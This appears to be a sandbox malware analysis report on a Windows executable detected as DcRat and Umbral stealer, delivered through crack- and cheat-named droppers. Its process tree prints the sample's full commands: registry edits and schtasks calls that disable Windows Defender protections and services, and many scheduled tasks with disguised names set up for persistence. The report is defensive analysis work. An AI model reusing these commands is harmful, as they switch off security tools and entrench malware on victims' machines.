Overview

overview

10

Static

static

10

E3A480A53D...85.exe

windows7-x64

10

E3A480A53D...85.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-10-2024 11:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    E3A480A53D8B2C398A7642E1F4E84785.exe

  • Size

    12.9MB

  • MD5

    e3a480a53d8b2c398a7642e1f4e84785

  • SHA1

    7f8fa5e3dc9be9055f9202213be33460a1af1e09

  • SHA256

    11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2

  • SHA512

    b3fce5ac73b75fb70d6c798517426ee614b72f24236baf07752f1289a8ce78d74c3c1ec5168f1d8fbcaa5b7de072ef3175f895ac1a49379f716209df49d103e8

  • SSDEEP

    393216:oJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8t:obQpgssCKInwjJaMu

Score
10/10
dcratumbraldefense_evasiondiscoveryevasioninfostealerpersistenceratstealertrojanvmprotect

Malware Config

Signatures

  • DcRat 56 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Detect Umbral payload 3 IoCs
  • Modifies WinLogon for persistence 2 TTPs 18 IoCs
    persistence
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 22 IoCs
    evasiontrojan
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Process spawned unexpected child process 54 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Adds Run key to start application 2 TTPs 34 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

    defense_evasion
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\E3A480A53D8B2C398A7642E1F4E84785.exe
    "C:\Users\Admin\AppData\Local\Temp\E3A480A53D8B2C398A7642E1F4E84785.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4476
    • C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe
      "C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3132
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2416
    • C:\Users\Admin\AppData\Local\Temp\Primordial Crack.exe
      "C:\Users\Admin\AppData\Local\Temp\Primordial Crack.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:996
      • C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe
        "C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:708
        • C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe
          "C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1692
          • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
            "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            PID:2592
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:3316
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1664
                • C:\blockweb\portrefNet.exe
                  "C:\blockweb\portrefNet.exe"
                  8⤵
                  • DcRat
                  • Modifies WinLogon for persistence
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4376
                  • C:\Program Files\Crashpad\attachments\TextInputHost.exe
                    "C:\Program Files\Crashpad\attachments\TextInputHost.exe"
                    9⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1084
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3600
          • C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe
            "C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:348
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4108
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                7⤵
                  PID:1860
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windows defender.bat" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:4656
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:760
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3208
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1532
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:1476
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:624
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:2396
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:2924
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:1860
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3820
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4472
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2456
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4556
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4464
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4816
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            4⤵
              PID:1536
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1152
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
              4⤵
              • System Location Discovery: System Language Discovery
              PID:960
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4836
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4388
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1892
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:548
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4768
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4260
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4536
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
              4⤵
              • Modifies Security services
              • System Location Discovery: System Language Discovery
              PID:4664
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
              4⤵
              • Modifies Security services
              • System Location Discovery: System Language Discovery
              PID:1820
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
              4⤵
              • Modifies Security services
              • System Location Discovery: System Language Discovery
              PID:748
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
              4⤵
              • Modifies Security services
              • System Location Discovery: System Language Discovery
              PID:3608
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
              4⤵
              • Modifies security service
              • System Location Discovery: System Language Discovery
              PID:1752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windows defender.bat" "
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3256
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            3⤵
              PID:4536
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              3⤵
              • System Location Discovery: System Language Discovery
              PID:812
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
              3⤵
                PID:748
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2608
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:3300
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:4244
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:1092
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:3392
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:3768
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4000
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4820
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                3⤵
                  PID:4892
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4296
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                  3⤵
                    PID:2124
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:772
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1456
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4108
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3780
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1300
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4216
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2068
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4612
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4392
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2564
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2244
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                    3⤵
                    • Modifies Security services
                    PID:3520
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                    3⤵
                    • Modifies Security services
                    • System Location Discovery: System Language Discovery
                    PID:4520
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                    3⤵
                    • Modifies Security services
                    • System Location Discovery: System Language Discovery
                    PID:3252
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                    3⤵
                    • Modifies Security services
                    • System Location Discovery: System Language Discovery
                    PID:1936
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                    3⤵
                    • Modifies security service
                    • System Location Discovery: System Language Discovery
                    PID:4364
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                1⤵
                  PID:2068
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "portrefNetp" /sc MINUTE /mo 5 /tr "'C:\Program Files\Crashpad\portrefNet.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4288
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "portrefNet" /sc ONLOGON /tr "'C:\Program Files\Crashpad\portrefNet.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:5048
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "portrefNetp" /sc MINUTE /mo 8 /tr "'C:\Program Files\Crashpad\portrefNet.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4768
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\TextInputHost.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1084
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\TextInputHost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2892
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\TextInputHost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3260
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:748
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3608
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:5104
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\blockweb\Registry.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1940
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\blockweb\Registry.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3032
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\blockweb\Registry.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4508
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\apppatch\es-ES\conhost.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:5072
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\apppatch\es-ES\conhost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4920
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\es-ES\conhost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1880
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\blockweb\RuntimeBroker.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3592
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\blockweb\RuntimeBroker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1872
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\blockweb\RuntimeBroker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1172
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2112
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1148
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4572
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Crashpad\attachments\TextInputHost.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:768
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Crashpad\attachments\TextInputHost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4724
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Program Files\Crashpad\attachments\TextInputHost.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3392
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Windows\LiveKernelReports\SearchApp.exe'" /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:5012
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\SearchApp.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4384
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\LiveKernelReports\SearchApp.exe'" /rl HIGHEST /f
                  1⤵
                  • DcRat
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4060
                • C:\Windows\system32\schtasks.exe
